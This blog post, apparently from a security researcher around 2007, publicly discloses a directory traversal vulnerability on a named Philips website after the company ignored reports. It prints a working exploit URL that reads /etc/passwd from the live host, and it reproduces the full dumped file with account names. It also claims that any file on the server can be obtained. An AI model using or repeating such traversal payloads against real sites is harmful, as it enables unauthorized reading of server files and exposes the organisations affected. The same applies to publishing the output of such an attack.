Who Wants To Root Philips.
Publicated on :
1180388013
Writing about hacking and security isn't like anything else. It's cool and depressing, fun and dangerous at the same time. You'll never know what to expect. That's the beauty of it I guess. Since application hacking is quite well known by now, it depresses me very much to encounter things I am to speak about.
My first directory traversal was around 1999 when I more or less found myself intrigued by web applications and was pretty stunned that I could hack Cisco from a browser instead of a terminal. Imagine that you know, without any GNU/Linux skills running Netscape on some Windows box trying to proof-root Cisco and send them my findings. And guess what, they never replied back. Maybe the hole is still open after all these years, who knows. It's fair to conclude that programmers still suck at security and it's likely not going to change any time soon. But the biggest problem for hackers or security pentesters is the way they have to contact a company to notify them of their security issues. To be honest, I never got a honest mail back, from no-one besides a couple of threats. One of them was Bank Of America, who pulled the plug on this very website. But I guess that comes with the territory. In the real world everyone would be happy if your neighbors notify you, that you forgot your house keys on the outside of the front door. But no, not in Internet land.
A reader called haykuro, contacted me one month ago about a gaping hole on the Philips domain. A classic directory traversal vulnerability. While that wasn't enough, I tried to be an upstanding citizen and contacted Philips. Which turns out to be virtually impossible. They seem to have really good human resource firewalls, but lack proper application firewalls. They never got back to me even when I said that I will disclose it unto the net. So, one month later and it's still not fixed. I took a couple of hours to write mails back and forth, all in vain. Now I got only one thing to say: go suck on it!
Directory traversal:
http://www.trimension.philips.com/index.php?page=../../../../../../etc/passwd
Notice that the passwords are shadowed. At least they got that right. A shadowed password is indicated as an X. This means that the passwords aren't visible in the passwd file but reside in the shadow file. Nonetheless, you can obtain any file you want.
passwd file:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:
/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin
/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD
Daemon:/:/sbin/nologin ident:x:100:101::/home/ident:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var
/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:
/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var
/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin
administrator:x:201:201::/home/administrator:/bin/bash fhsvct:x:203:203::/home/fhsvcs:
/bin/false webstats:x:250:250::/var/ossec:/sbin/nologin